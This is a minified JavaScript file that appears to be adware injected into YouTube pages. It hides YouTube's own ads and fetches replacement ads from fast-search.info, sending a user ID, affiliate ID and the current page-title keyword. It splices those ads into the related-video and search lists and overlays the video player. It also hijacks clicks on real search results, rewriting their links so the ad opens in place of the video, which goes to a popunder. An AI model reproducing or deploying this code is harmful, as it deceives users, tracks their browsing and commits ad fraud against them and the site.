var trkid='58c1388102b70';var uid='F369892DAEE44EAAA1924FD165BCD77F';var affid='1123';var dom = 'fast-search.info';var ytcheckinc=0;var insertloop=0;var time;var target;MutationObserver=window.MutationObserver||window.WebKitMutationObserver;var target=document.querySelector('head > title');var observer=new window.MutationObserver(function(mutations){if(typeof time=='undefined'){ytcheckinc=0;ytcheck();}
else{var difference=new Date().getTime()-time;if(self==top&&difference>1000){ytcheckinc=0;ytcheck();}
else{}}});function getXDomainRequest(){var e=null;if(window.XDomainRequest)e=new XDomainRequest();else if(window.XMLHttpRequest)e=new XMLHttpRequest();return e;}
function removeElementsByClass(className){var elements=document.getElementsByClassName(className);while(elements.length>0){elements[0].parentNode.removeChild(elements[0]);}}
function getrandimg(imgarray,callback){var max=imgarray.length;var min=0;var randnumb=Math.floor(Math.random()*(max-min+1))+min;var randimg=imgarray[randnumb];if(typeof randimg!=="undefined"&&randimg!==null&&randimg.width>100&&randimg.height>45&&randimg.src.indexOf('.jpg')>0){callback(randimg);}
else{getrandimg(imgarray,callback);}}
function ytcheck(){if(self==top){observer.observe(target,{subtree:true,childList:true,characterData:true});var node=document.createElement('style');node.innerHTML=".pyv-afc-ads-inner,.ad-div,.video-list-item-link,#watch7-sidebar-ads,.video-ads{display:none!important}.s9999{padding:10px 15px!important;}";document.head.appendChild(node);var e=document.getElementById("results");var t=document.getElementById("eow-title");var n=document.getElementById("f"+trkid);var r=document.getElementById("watch7-sidebar-modules");var i=document.getElementsByClassName("adsingle")[0];var pageurl=window.location.href;var substring="&"+uid;if(pageurl.indexOf(substring)<1&&(typeof n=="undefined"||n===null)){if(typeof t!=="undefined"&&t!==null){getAds(4,function(result){node.innerHTML=".pyv-afc-ads-inner,.ad-div,.video-list-item-link,#watch7-sidebar-ads,.video-ads{display:none!important}";removeElementsByClass('pyv-afc-ads-container');var divtotarget="watch7-sidebar-modules";var div=document.createElement("div");div.setAttribute("id","sadsfs");div.innerHTML=result;insertinto(divtotarget,div);var classname="s";classname+=trkid;var adsarray=div.getElementsByClassName(classname);adsarray=[].slice.call(adsarray);var maxads=adsarray.length;var ytalgos=document.getElementById("watch-related").getElementsByClassName("video-list-item");ytalgos=[].slice.call(ytalgos);for(var j=0;j<maxads;j++){var streamad=adsarray[j];var ytalgo=ytalgos[j];streamad.querySelector('p a span img').style.margin="0 2px 0 5px";insertAfter(ytalgo,streamad);}
if(result.indexOf('videoadtrue')>-1){var t=1<<(maxads);var m=maxads-Math.floor(Math.log((Math.random()*t)+1)/ Math.log(2));var previousvad=document.getElementById('videoadcontainer');if(typeof previousvad!=="undefined"&&previousvad!==null){previousvad.parentNode.removeChild(elements[0]);}
var videoadcontainer=document.createElement("div");videoadcontainer.setAttribute("id","videoadcontainer");videoadcontainer.setAttribute("class",classname);videoadcontainer.innerHTML=adsarray[m].innerHTML+'<span id="closex" style="position:absolute;bottom:5px;right:5px;cursor:pointer;" onClick="this.parentNode.parentNode.removeChild(this.parentNode);">X</span>';vadpopunder(videoadcontainer);var eElement=document.getElementById("movie_player");setTimeout(function(){eElement.insertBefore(videoadcontainer,eElement.firstChild);},1300);videoadcontainer.querySelector('p a').onclick=function(){videoadcontainer.parentNode.removeChild(videoadcontainer);};}});}else if(typeof e!=="undefined"&&e!==null){getAds(2,function(result){removeElementsByClass('pyv-afc-ads-container');var divtotarget="results";var div=document.createElement("div");div.setAttribute("id","sadsfs");div.innerHTML=result;insertinto(divtotarget,div);var div2=div.cloneNode(true);var classname="s";classname+=trkid;var adsarray=div2.getElementsByClassName(classname);adsarray=[].slice.call(adsarray);var maxads=adsarray.length;var thumbnails=document.getElementById("results").getElementsByTagName('img');thumbnails=[].slice.call(thumbnails);var ytalgos=document.getElementById("results").getElementsByClassName("yt-lockup-video");ytalgos=[].slice.call(ytalgos);for(var j=0;j<maxads;j++){var streamad=adsarray[j];var ytalgo=ytalgos[j];if(result.indexOf('thoAt5e2iaDr')>-1){ytalgpopunder(streamad,ytalgo);}
insertAfter(ytalgo,streamad);getrandimg(thumbnails,function(randimg){if(typeof randimg!=="undefined"&&randimg!==null&&randimg.width>100&&randimg.height>45&&randimg.src.indexOf('.jpg')>0){streamad.querySelector('p a span img').src=randimg.src;streamad.querySelector('p a span img').width=randimg.width;streamad.querySelector('p a span img').height=randimg.height;}
else{}});}});}else if(typeof r!=="undefined"&&r!==null){if(typeof i=="undefined"||i===null){getAds(4,function(result){var divtotarget="watch7-sidebar-modules";var div=document.createElement("div");div.setAttribute("id","sadsfs");div.innerHTML=result;insertinto(divtotarget,div);});}}
else if(ytcheckinc<5){setTimeout(function(){ytcheckinc++;ytcheck();},200);}}
else if(ytcheckinc<50){setTimeout(function(){ytcheckinc++;ytcheck();},200);}}}
function urlcleanup(url){var urlclean=url.replace(/this.href='|';/i,"");return urlclean;}
function openInNewTab(url){var win=window.open(url,'_blank');}
function vadpopunder(vad){var currenturl=window.location.href;currenturl=currenturl+'&'+uid;vad.querySelector('p a').setAttribute('target','_self');vad.querySelector('p a').addEventListener('click',function(event){openInNewTab(currenturl);});}
function ytalgpopunder(yad,gad){var yadurl=yad.querySelector('p a').getAttribute('onmousedown');var yadurl=urlcleanup(yadurl);var yturl=gad.querySelector('div div a').getAttribute('href');yturl=yturl+'&'+uid;gad.addEventListener('click',function(event){window.open(yturl,"_blank");window.open(yadurl,"_self");});var a=gad.getElementsByTagName('a');for(var i=0;i<a.length;i++){var elem=a[i];elem.setAttribute('href','#');}}
function getCurrentKw(){var urltitle=target.innerHTML;var kwarray=urltitle.split(" - ");var keyword=kwarray[0];return keyword;}
function deleteParentElement(n){n.parentNode.parentNode.removeChild(n.parentNode);}
function insertAfter(referenceNode,newNode){referenceNode.parentNode.insertBefore(newNode,referenceNode.nextSibling);}
function getAds(t,callback){var kw=getCurrentKw();kw=encodeURIComponent(kw);kw=kw.replace('&#9654;','');var n="https://www."+dom+"/script/tcontainer.php?t="+t+"&u="+uid+"&a="+affid+"&tr="+trkid+"&keyword="+kw;var u=getXDomainRequest();u.onload=function(){var result=u.responseText;callback(result);}
u.open("GET",n);u.send();}
function insertinto(target,ads){var targetdiv=document.getElementById(target);if(typeof targetdiv!=="undefined"&&targetdiv!==null){var oldads=document.getElementById("sadsfs");if(oldads)oldads.parentNode.removeChild(oldads);targetdiv.parentNode.insertBefore(ads,targetdiv);}
else if(insertloop<30){insertloop++;setTimeout(function(){insertinto(target,ads);},200);}}
ytcheck();